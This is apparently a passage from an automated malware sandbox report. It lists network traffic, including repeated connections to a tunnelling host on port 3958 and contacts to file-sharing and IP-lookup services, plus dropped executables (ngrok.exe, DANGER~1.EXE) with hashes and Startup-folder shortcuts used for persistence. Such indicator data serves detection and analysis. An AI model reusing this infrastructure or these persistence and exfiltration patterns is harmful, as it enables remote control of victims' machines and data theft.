US 8.8.8.8:53 www.filemail.com udp
US 8.8.8.8:53 www.filemail.com udp
US 8.8.8.8:53 181.23.21.178.in-addr.arpa udp
US 8.8.8.8:53 analytics.filemail.com udp
NL 178.21.23.181:443 www.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
NL 20.82.124.160:443 analytics.filemail.com tcp
US 8.8.8.8:53 api-001.filemail.com udp
US 8.8.8.8:53 api-001.filemail.com udp
US 8.8.8.8:53 160.124.82.20.in-addr.arpa udp
US 8.8.8.8:53 232.187.250.142.in-addr.arpa udp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
GB 142.250.178.2:443 googleads.g.doubleclick.net udp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 www.google.co.uk udp
GB 172.217.169.35:443 www.google.co.uk tcp
US 8.8.8.8:53 www.google.co.uk udp
US 8.8.8.8:53 www.google.co.uk udp
GB 142.250.200.4:443 www.google.com udp
GB 172.217.169.35:443 www.google.co.uk udp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 3002.filemail.com udp
US 8.8.8.8:53 ip.3002.filemail.com udp
NO 193.30.119.102:443 ip.3002.filemail.com tcp
US 8.8.8.8:53 ip.3002.filemail.com udp
N/A 127.0.0.1:56666 tcp
US 8.8.8.8:53 102.119.30.193.in-addr.arpa udp
US 8.8.8.8:53 www.filemail.com udp
US 8.8.8.8:53 widget.intercom.io udp
DE 13.32.27.114:443 widget.intercom.io tcp
US 8.8.8.8:53 widget.intercom.io udp
N/A 127.0.0.1:56666 tcp
US 8.8.8.8:53 widget.intercom.io udp
DE 13.32.27.114:443 widget.intercom.io udp
US 8.8.8.8:53 js.intercomcdn.com udp
DE 18.66.147.49:443 js.intercomcdn.com tcp
US 8.8.8.8:53 js.intercomcdn.com udp
DE 18.66.147.49:443 js.intercomcdn.com tcp
US 8.8.8.8:53 js.intercomcdn.com udp
DE 18.66.147.49:443 js.intercomcdn.com udp
US 8.8.8.8:53 114.27.32.13.in-addr.arpa udp
US 8.8.8.8:53 49.147.66.18.in-addr.arpa udp
US 8.8.8.8:53 api-iam.intercom.io udp
US 52.3.143.140:443 api-iam.intercom.io tcp
US 8.8.8.8:53 api-iam.intercom.io udp
US 8.8.8.8:53 api-iam.intercom.io udp
US 8.8.8.8:53 nexus-websocket-a.intercom.io udp
US 8.8.8.8:53 nexus-websocket-a.intercom.io udp
US 34.237.73.95:443 nexus-websocket-a.intercom.io tcp
US 8.8.8.8:53 nexus-websocket-a.intercom.io udp
US 8.8.8.8:53 140.143.3.52.in-addr.arpa udp
US 8.8.8.8:53 95.73.237.34.in-addr.arpa udp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
US 8.8.8.8:53 id.google.com udp
JP 142.251.42.131:443 id.google.com tcp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 id.google.com udp
JP 142.251.42.131:443 id.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.180.22:443 i.ytimg.com tcp
US 8.8.8.8:53 i.ytimg.com udp
JP 142.251.42.131:443 id.google.com udp
GB 142.250.180.22:443 i.ytimg.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.180.22:443 i.ytimg.com tcp
GB 142.250.180.22:443 i.ytimg.com udp
US 8.8.8.8:53 131.42.251.142.in-addr.arpa udp
US 8.8.8.8:53 22.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
GB 216.58.212.238:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 216.58.212.238:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 238.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 processhacker.sourceforge.io udp
US 8.8.8.8:53 www.google.com udp
US 172.64.148.49:443 processhacker.sourceforge.io tcp
US 8.8.8.8:53 prwebsecure.sourceforge.io.cdn.cloudflare.net udp
US 8.8.8.8:53 prwebsecure.sourceforge.io.cdn.cloudflare.net udp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 172.64.148.49:443 prwebsecure.sourceforge.io.cdn.cloudflare.net udp
US 8.8.8.8:53 sourceforge.net udp
US 172.64.150.145:443 sourceforge.net tcp
US 8.8.8.8:53 sourceforge.net udp
US 8.8.8.8:53 sourceforge.net udp
US 172.64.150.145:443 sourceforge.net udp
US 8.8.8.8:53 49.148.64.172.in-addr.arpa udp
US 8.8.8.8:53 145.150.64.172.in-addr.arpa udp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 static.doubleclick.net udp
GB 142.250.200.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 142.250.179.234:443 jnn-pa.googleapis.com tcp
GB 142.250.178.2:443 googleads.g.doubleclick.net udp
GB 142.250.200.6:443 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 142.250.179.234:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 8.8.8.8:53 6.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 region1.google-analytics.com udp
GB 142.250.179.234:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
BE 74.125.206.157:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
BE 74.125.206.157:443 stats.g.doubleclick.net udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 157.206.125.74.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 216.239.32.36:443 region1.google-analytics.com udp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
US 172.64.150.145:443 sourceforge.net tcp
US 172.64.150.145:443 sourceforge.net udp
US 8.8.8.8:53 a.fsdn.com udp
US 172.64.147.47:443 a.fsdn.com tcp
US 172.64.147.47:443 a.fsdn.com tcp
US 172.64.147.47:443 a.fsdn.com tcp
US 8.8.8.8:53 a.fsdn.com.cdn.cloudflare.net udp
US 172.64.147.47:443 a.fsdn.com.cdn.cloudflare.net tcp
US 172.64.147.47:443 a.fsdn.com.cdn.cloudflare.net tcp
US 172.64.147.47:443 a.fsdn.com.cdn.cloudflare.net tcp
US 172.64.147.47:443 a.fsdn.com.cdn.cloudflare.net tcp
US 172.64.147.47:443 a.fsdn.com.cdn.cloudflare.net tcp
US 8.8.8.8:53 a.fsdn.com.cdn.cloudflare.net udp
US 8.8.8.8:53 47.147.64.172.in-addr.arpa udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.56.101:443 static.cloudflareinsights.com tcp
US 172.64.147.47:443 a.fsdn.com.cdn.cloudflare.net udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 d.delivery.consentmanager.net udp
US 8.8.8.8:53 cdn.consentmanager.net udp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 8.8.8.8:53 d.delivery.consentmanager.net udp
GB 89.187.167.7:443 cdn.consentmanager.net tcp
US 8.8.8.8:53 1376624012.rsc.cdn77.org udp
US 8.8.8.8:53 d.delivery.consentmanager.net udp
US 8.8.8.8:53 c.sf-syn.com udp
US 8.8.8.8:53 1376624012.rsc.cdn77.org udp
US 8.8.8.8:53 c.sf-syn.com udp
US 104.18.33.97:443 c.sf-syn.com tcp
US 8.8.8.8:53 c.sf-syn.com udp
US 104.18.33.97:443 c.sf-syn.com udp
US 8.8.8.8:53 101.56.16.104.in-addr.arpa udp
US 8.8.8.8:53 76.98.230.87.in-addr.arpa udp
US 8.8.8.8:53 7.167.187.89.in-addr.arpa udp
US 8.8.8.8:53 97.33.18.104.in-addr.arpa udp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 ap.lijit.com udp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 104.22.74.216:443 btloader.com tcp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 fastlane.rubiconproject.com udp
NL 185.89.210.244:443 ib.adnxs.com tcp
US 8.8.8.8:53 ib.anycast.adnxs.com udp
NL 216.52.2.16:443 ap.lijit.com tcp
US 8.8.8.8:53 oeu.vap.lijit.com udp
DE 52.59.150.152:443 btlr.sharethrough.com tcp
DE 52.59.150.152:443 btlr.sharethrough.com tcp
DE 52.59.150.152:443 btlr.sharethrough.com tcp
DE 52.59.150.152:443 btlr.sharethrough.com tcp
US 8.8.8.8:53 analytics.slashdotmedia.com udp
US 8.8.8.8:53 btloader.com udp
DE 69.173.144.140:443 fastlane.rubiconproject.com tcp
US 8.8.8.8:53 ib.anycast.adnxs.com udp
US 8.8.8.8:53 oeu.vap.lijit.com udp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
NL 185.64.189.112:443 hbopenbid.pubmatic.com tcp
US 8.8.8.8:53 ml314.com udp
US 8.8.8.8:53 btlr-eu-central-1.sharethrough.com udp
US 8.8.8.8:53 tagged-by.rubiconproject.net.akadns.net udp
US 8.8.8.8:53 analytics.slashdotmedia.com udp
US 8.8.8.8:53 btlr-eu-central-1.sharethrough.com udp
US 8.8.8.8:53 analytics.slashdotmedia.com udp
US 8.8.8.8:53 tagged-by.rubiconproject.net.akadns.net udp
US 8.8.8.8:53 hbopenbid-ams.pubmnet.com udp
US 8.8.8.8:53 ml314.com udp
US 8.8.8.8:53 hbopenbid-ams.pubmnet.com udp
US 8.8.8.8:53 ml314.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 securepubads46.g.doubleclick.net udp
US 8.8.8.8:53 216.74.22.104.in-addr.arpa udp
US 8.8.8.8:53 244.210.89.185.in-addr.arpa udp
US 8.8.8.8:53 16.2.52.216.in-addr.arpa udp
US 8.8.8.8:53 152.150.59.52.in-addr.arpa udp
US 8.8.8.8:53 140.144.173.69.in-addr.arpa udp
US 8.8.8.8:53 112.189.64.185.in-addr.arpa udp
US 8.8.8.8:53 9.38.105.216.in-addr.arpa udp
US 8.8.8.8:53 securepubads46.g.doubleclick.net udp
US 34.117.77.79:443 ml314.com tcp
GB 142.250.187.194:443 securepubads46.g.doubleclick.net tcp
US 8.8.8.8:53 ad-delivery.net udp
US 8.8.8.8:53 api.btloader.com udp
US 172.67.69.19:443 ad-delivery.net tcp
US 8.8.8.8:53 ad-delivery.net udp
US 172.67.69.19:443 ad-delivery.net tcp
US 130.211.23.194:443 api.btloader.com tcp
US 8.8.8.8:53 api.btloader.com udp
US 8.8.8.8:53 ad-delivery.net udp
US 8.8.8.8:53 api.btloader.com udp
US 34.117.77.79:443 ml314.com udp
GB 142.250.187.194:443 securepubads46.g.doubleclick.net udp
US 130.211.23.194:443 api.btloader.com udp
US 8.8.8.8:53 dpm.demdex.net udp
US 8.8.8.8:53 idsync.rlcdn.com udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 8.8.8.8:53 ps.eyeota.net udp
US 8.8.8.8:53 dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com udp
IE 52.210.214.220:443 dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com tcp
US 130.211.23.194:443 api.btloader.com udp
DE 3.122.214.165:443 ps.eyeota.net tcp
US 8.8.8.8:53 ps.eyeota.net udp
US 8.8.8.8:53 dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com udp
US 52.223.40.198:443 match.adsrvr.org tcp
US 8.8.8.8:53 match.adsrvr.org udp
US 35.244.174.68:443 idsync.rlcdn.com tcp
IE 54.170.64.73:443 sync.crwdcntrl.net tcp
US 8.8.8.8:53 79.77.117.34.in-addr.arpa udp
US 8.8.8.8:53 194.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 19.69.67.172.in-addr.arpa udp
US 8.8.8.8:53 194.23.211.130.in-addr.arpa udp
US 8.8.8.8:53 230.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 ps.eyeota.net udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 idsync.rlcdn.com udp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 8.8.8.8:53 idsync.rlcdn.com udp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 35.244.174.68:443 idsync.rlcdn.com udp
US 8.8.8.8:53 981e269e0f096d6cffe0cfba36c07839.safeframe.googlesyndication.com udp
GB 142.250.179.225:443 981e269e0f096d6cffe0cfba36c07839.safeframe.googlesyndication.com tcp
US 8.8.8.8:53 pagead-googlehosted.l.google.com udp
US 8.8.8.8:53 pagead-googlehosted.l.google.com udp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
GB 142.250.179.225:443 pagead-googlehosted.l.google.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 220.214.210.52.in-addr.arpa udp
US 8.8.8.8:53 165.214.122.3.in-addr.arpa udp
US 8.8.8.8:53 198.40.223.52.in-addr.arpa udp
US 8.8.8.8:53 68.174.244.35.in-addr.arpa udp
US 8.8.8.8:53 73.64.170.54.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.179.226:443 www.googletagservices.com tcp
GB 142.250.200.4:443 www.google.com udp
GB 142.250.179.226:443 www.googletagservices.com udp
US 8.8.8.8:53 ads.pubmatic.com udp
US 8.8.8.8:53 sync-tm.everesttech.net udp
US 8.8.8.8:53 image8.pubmatic.com udp
GB 96.16.109.9:443 ads.pubmatic.com tcp
US 8.8.8.8:53 e6603.g.akamaiedge.net udp
US 8.8.8.8:53 e6603.g.akamaiedge.net udp
US 8.8.8.8:53 imgsync-amsfpairbc.pubmnet.com udp
US 8.8.8.8:53 h2.shared.global.fastly.net udp
US 8.8.8.8:53 imgsync-amsfpairbc.pubmnet.com udp
US 8.8.8.8:53 h2.shared.global.fastly.net udp
US 151.101.2.49:443 h2.shared.global.fastly.net tcp
NL 198.47.127.18:443 imgsync-amsfpairbc.pubmnet.com tcp
US 8.8.8.8:53 pixel.rubiconproject.com udp
US 8.8.8.8:53 cm.g.doubleclick.net udp
NL 213.19.162.90:443 pixel.rubiconproject.com tcp
US 8.8.8.8:53 cm.g.doubleclick.net udp
US 8.8.8.8:53 pixel.rubiconproject.net.akadns.net udp
US 8.8.8.8:53 cm.g.doubleclick.net udp
US 8.8.8.8:53 pixel.rubiconproject.net.akadns.net udp
US 8.8.8.8:53 match.sharethrough.com udp
US 8.8.8.8:53 match-eu-central-1-ecs.sharethrough.com udp
DE 3.123.163.66:443 match.sharethrough.com tcp
DE 3.123.163.66:443 match.sharethrough.com tcp
US 8.8.8.8:53 match-eu-central-1-ecs.sharethrough.com udp
US 8.8.8.8:53 9.109.16.96.in-addr.arpa udp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 18.127.47.198.in-addr.arpa udp
US 8.8.8.8:53 66.163.123.3.in-addr.arpa udp
US 8.8.8.8:53 90.162.19.213.in-addr.arpa udp
US 8.8.8.8:53 api-iam.intercom.io udp
US 52.3.143.140:443 api-iam.intercom.io tcp
US 8.8.8.8:53 api-iam.intercom.io udp
US 8.8.8.8:53 api-iam.intercom.io udp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
US 8.8.8.8:53 downloads.sourceforge.net udp
US 204.68.111.105:443 downloads.sourceforge.net tcp
US 8.8.8.8:53 downloads.sourceforge.net udp
US 8.8.8.8:53 downloads.sourceforge.net udp
US 8.8.8.8:53 105.111.68.204.in-addr.arpa udp
US 8.8.8.8:53 netix.dl.sourceforge.net udp
BG 87.121.121.2:443 netix.dl.sourceforge.net tcp
US 8.8.8.8:53 netix.dl.sourceforge.net udp
US 8.8.8.8:53 netix.dl.sourceforge.net udp
BG 87.121.121.2:443 netix.dl.sourceforge.net tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
US 8.8.8.8:53 deac-riga.dl.sourceforge.net udp
LV 89.111.52.100:443 deac-riga.dl.sourceforge.net tcp
US 8.8.8.8:53 deac-riga.dl.sourceforge.net udp
US 8.8.8.8:53 deac-riga.dl.sourceforge.net udp
US 8.8.8.8:53 100.52.111.89.in-addr.arpa udp
LV 89.111.52.100:443 deac-riga.dl.sourceforge.net tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
DE 52.59.150.152:443 btlr.sharethrough.com tcp
NL 185.89.210.244:443 ib.anycast.adnxs.com tcp
NL 216.52.2.16:443 oeu.vap.lijit.com tcp
GB 142.250.187.194:443 securepubads46.g.doubleclick.net udp
GB 142.250.179.225:443 pagead-googlehosted.l.google.com udp
GB 142.250.179.226:443 www.googletagservices.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
US 8.8.8.8:53 wj32.org udp
US 162.243.25.33:443 wj32.org tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 processhacker.sourceforge.net udp
US 104.18.37.111:80 processhacker.sourceforge.net tcp
US 104.18.37.111:443 processhacker.sourceforge.net tcp
US 172.64.148.49:443 prwebsecure.sourceforge.io.cdn.cloudflare.net tcp
US 8.8.8.8:53 111.37.18.104.in-addr.arpa udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 file.io udp
US 45.55.107.24:443 file.io tcp
US 8.8.8.8:53 hawkish.eu udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 24.107.55.45.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 51.178.66.33:443 api.gofile.io tcp
FR 163.5.121.96:443 hawkish.eu tcp
DE 144.76.136.153:443 transfer.sh tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 96.121.5.163.in-addr.arpa udp
FR 163.5.121.96:443 hawkish.eu tcp
US 45.55.107.24:443 file.io tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

MD5 79d678dc0f7ce5531987f419b5b351d8
SHA1 8057d198da18ae7bc498917926aeb8953e45a428
SHA256 1c56041812c05c134bc380961330e38053774cf08596846b66e9fdf848783400
SHA512 97d1a92d812633c1f85fcc85d63959bb0bc835c8003567693caff3bbfc385459a0b3a9662737b15cc26949148e0b8ef6e83513db20b9a8ba5c374feedd287684

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE

MD5 32a4a1eb04f1c7e75e95321992a193b4
SHA1 009a7ff13e0bf73ad3b9b4d31d7192be4f6f22e2
SHA256 602b5b3924e9e408dddf592a561bf2dd7fc561bd6db31120d6c2652091df733a
SHA512 a41a648d98a2e28cf7b4129c9b5136e5eda773addb7dad311d2141ad5075c3363fc25d1a81cefc36abef9a0d3dd3456b2bbdfc06cb8088f6d082559fc7575bdf

memory/3640-14-0x00000000748F0000-0x00000000750A0000-memory.dmp

memory/3640-15-0x00000000003B0000-0x0000000000442000-memory.dmp

memory/3640-16-0x0000000004E30000-0x0000000004ECC000-memory.dmp

memory/3640-17-0x0000000005480000-0x0000000005A24000-memory.dmp

memory/3640-18-0x0000000004F70000-0x0000000005002000-memory.dmp

memory/3640-19-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/3640-20-0x0000000004EF0000-0x0000000004EFA000-memory.dmp

memory/3640-21-0x0000000005130000-0x0000000005186000-memory.dmp

memory/3640-22-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/3640-23-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/3640-24-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/3640-25-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/3640-26-0x0000000007F60000-0x0000000008060000-memory.dmp

memory/3640-27-0x00000000748F0000-0x00000000750A0000-memory.dmp

memory/3640-28-0x00000000080C0000-0x00000000080DE000-memory.dmp

memory/3640-31-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/3640-32-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/3640-44-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/2660-46-0x00000000748F0000-0x00000000750A0000-memory.dmp

memory/3640-47-0x00000000748F0000-0x00000000750A0000-memory.dmp

memory/2660-48-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-49-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-50-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-51-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-52-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-53-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-54-0x0000000007F90000-0x0000000008090000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk

MD5 371e9f5c5222743275e228f1b3d27fb1
SHA1 31b0a7ada0ee8c593d1f7d4b8fa3f830566a5fd6
SHA256 5684b6a81a92bef5cd5eb049a0e905dc99e7db95d907443f182614b9b48602f1
SHA512 14f203f243e9c69a3b3e1beaf8599d5cd0f18627e446a3beac78cb611bb4259ffb4c47ece4da3d3ff4ee1dd01aa379b081a3548844070d3b7312f56d22ffc78f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk

MD5 a0e21c3cda955b529c05da3ebc737559
SHA1 7cede9bd6a34b2ddb326c3733057cf76b11e3d45
SHA256 b34c6f792079e84046ce8c2049f6f233e6c235f025770a028dfc8d57bc54af8c
SHA512 e37365ed423d523ca996460ab7adab0a19923906413d22cccde2f1ce144ea25deef5e1a2a6d3cc8580952ebd58438f36f5eb2cb82348e1e3d126fa248d5fc18a

memory/2660-59-0x00000000748F0000-0x00000000750A0000-memory.dmp

memory/2660-60-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-61-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-62-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-63-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-64-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-65-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-66-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/2660-67-0x0000000007F90000-0x0000000008090000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\datareporting\glean\db\data.safe.bin

MD5 c38dad3f5c479337b0f22f7470389697
SHA1 c92f69f3c68f9f1a1605bf08efaab1dbcf80f506
SHA256 4e32f53d17b7f5d5348dec19f725a9c7e3cbba67be9a9d2562b817bfa71cd56a
SHA512 6e1ecfc9f58332e47d410c99a47aef8c8282c15731de28cb720e0571b816617752480dc6eb0dc195afb683243c27bacaa5e415df33cff488736a5c5d5878b58e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\datareporting\glean\pending_pings\f7cb872e-9723-4776-b547-aea4030eb296

MD5 6844812e4b6aba8577b1fbbdfe17dc45
SHA1 728cd6a10a334c55b50e6dde6c4aef304b378d6c
SHA256 1ad06fdfca5ca4a588deffca311abc75421a62d2c755613f5fe1107650148950
SHA512 580e3f28788eaacc0c6052e029089b8d1818eac72ee970f0f2a0b276b89ec9c33d2cbceb64668068c6333816fd4cf61a16dd461cf42b63655b0aa6368357cbec

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\datareporting\glean\pending_pings\c78bf86e-b2ac-408d-9aa5-19334630b331

